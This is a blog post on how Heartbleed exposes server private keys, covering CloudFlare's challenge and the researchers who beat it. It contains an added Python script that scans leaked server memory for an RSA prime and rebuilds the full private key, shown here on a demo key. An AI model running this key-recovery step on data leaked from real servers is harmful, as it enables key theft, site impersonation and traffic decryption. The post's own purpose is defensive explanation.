Heartbleed exposes privates

Heartbleed

This is as serious as it gets. Heartbleed exposes your corporate private keys: your crown jewels, your keys to the castle, well, you get the idea. Your corporate privates are indeed exposed. They may not have been stolen yet, but they are unequivocally exposed through Heartbleed. It took researchers less than 3 hours to extract a private key from a server in response to a challenge issued by CloudFlare. Patching OpenSSL stops the leak, but it cannot recall anything already read from memory, so any server that was exposed needs a new key, a reissued certificate, and a revocation of the old one.

Last week, CloudFlare provided a level-headed statement that the likelihood of extracting private keys was very low.

We think that stealing private keys on most NGINX servers is at least extremely hard and, likely, impossible. Even with Apache, which we think may be slightly more vulnerable, and we do not use at CloudFlare, we believe the likelihood of private SSL keys being revealed with the Heartbleed vulnerability is very low. That’s about the only good news of the last week.

CloudFlare subsequently set up a test web server and issued a challenge that was quickly met by at least four researchers. In The Results of the CloudFlare Challenge, the author, Nick Sullivan, rightly states:

This result reminds us not to underestimate the power of the crowd and emphasizes the danger posed by this vulnerability.

Congratulations to the following security experts for ensuring that the IT community continues to take this issue seriously:

  1. Fedor Indutny, Software Engineer
  2. Ilkka Mattila, NCSC-FI
  3. Rubin Xu, PhD student, Cambridge University
  4. Ben Murphy, Security Researcher

Your work has changed our collective assessment of Heartbleed’s private-key exposure from “very low” to “dangerous.”
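To make the challenge result concrete, here is an added example (not code from the original post or from any of the researchers) of the approach described in the CloudFlare results post linked below: a heartbeat response is raw server heap, OpenSSL keeps the RSA primes p and q in memory as BIGNUMs (arrays of little-endian 64-bit limbs), so every window of the leaked bytes is read as an integer and tested for dividing the public modulus n taken from the server's certificate. One prime factor is the whole private key. The key (two Mersenne primes instead of a 2048-bit key), the 16 KB leak size, the random heap noise, and the function names are all assumptions made so the script runs offline.

```python
from __future__ import annotations

import random

# Constructed demo key: two Mersenne primes, so no key-generation library is
# needed. A real key is 2048 bits; the scan below is identical, only slower.
P = 2**61 - 1
Q = 2**89 - 1
E = 65537
N = P * Q

LIMB = 8  # OpenSSL's BN_ULONG is 64 bits on x86-64


def to_limbs(value: int) -> bytes:
    """Serialize a bignum the way OpenSSL's BIGNUM holds it in memory:
    an array of little-endian 64-bit limbs."""
    nlimbs = (value.bit_length() + 63) // 64
    return value.to_bytes(nlimbs * LIMB, "little")


def build_leak(prime: int, size: int = 16 * 1024, seed: int = 1) -> tuple[bytes, int]:
    """Constructed stand-in for one heartbeat response: random heap noise with
    the serialized prime planted at a limb-aligned offset (a 64 KB response
    works the same way). Returns (leak, planted_offset)."""
    rng = random.Random(seed)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    blob = to_limbs(prime)
    offset = rng.randrange(0, (size - len(blob)) // LIMB) * LIMB
    buf[offset:offset + len(blob)] = blob
    return bytes(buf), offset


def find_factor(leak: bytes, n: int) -> tuple[int, int] | None:
    """Scan leaked memory for a window that, read as a little-endian integer,
    is a non-trivial divisor of n. Every byte offset and every length from one
    limb up to half the modulus is tried, so no allocator alignment is assumed.
    Returns (offset, factor), or None if no key material was in the leak."""
    max_limbs = ((n.bit_length() + 63) // 64 + 1) // 2
    for offset in range(len(leak)):
        if not leak[offset] & 1:      # RSA primes are odd: cheap filter
            continue
        for nlimbs in range(1, max_limbs + 1):
            end = offset + nlimbs * LIMB
            if end > len(leak):
                break
            cand = int.from_bytes(leak[offset:end], "little")
            if 1 < cand < n and n % cand == 0:
                return offset, cand
    return None


def recover_private_key(n: int, e: int, factor: int) -> tuple[int, int, int]:
    """One prime factor of n is the whole private key: q = n / p and
    d = e^-1 mod (p-1)(q-1). Wrapping (n, e, d, p, q) in PKCS#1 ASN.1 is all
    that remains to write out a PEM file."""
    p = factor
    q = n // p
    if p * q != n:
        raise ValueError("not a factor of n")
    d = pow(e, -1, (p - 1) * (q - 1))  # modular inverse, Python 3.8+
    return p, q, d


def demo() -> bool:
    """Plant P in a constructed leak, recover the key, prove it decrypts."""
    leak, planted_at = build_leak(P)
    hit = find_factor(leak, N)
    if hit is None:
        return False
    offset, factor = hit
    p, q, d = recover_private_key(N, E, factor)
    ciphertext = pow(42, E, N)          # anything encrypted to the public key
    return offset == planted_at and {p, q} == {P, Q} and pow(ciphertext, d, N) == 42


if __name__ == "__main__":
    print("private key recovered from leak:", demo())
```

The point of the byte-by-byte scan is that nothing about the leak needs to be parsed or understood: the modulus is public, a prime factor is a fixed byte pattern somewhere in the heap, and trial division over every window finds it in seconds even for a 64 KB response and a 2048-bit key. Whether the prime lands in the leaked region at all depends on allocator behaviour, which is exactly what the challenge settled.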

Useful resources:

  1. PC World: Tests confirm Heartbleed bug can expose server’s private key.
  2. Answering the Critical Question: Can You Get Private SSL Keys Using Heartbleed?
  3. Results of the CloudFlare Challenge